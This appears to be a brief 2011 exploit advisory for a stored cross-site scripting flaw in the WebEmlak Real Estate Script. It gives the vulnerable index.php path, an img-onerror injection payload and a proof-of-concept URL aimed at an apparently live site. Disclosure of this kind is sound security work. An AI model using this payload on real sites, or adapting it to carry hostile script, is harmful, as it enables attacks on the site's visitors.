# Exploit Title: WebEmlak Real Estate Script Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr


ISSUE

Cross Site Scripting can be done using the URL input

Vulnerable Page:
index.php


Example:
index.php/<XSS Code>


Exploit:
index.php/"/></a></><img src=1.gif onerror=alert(1)>


POC:
http://www.webemlakofisi.com/portal2/index.php/%22/%3E%3C/a%3E%3C/%3E%3Cimg%20src=1.gif%20onerror=alert%281%29%3E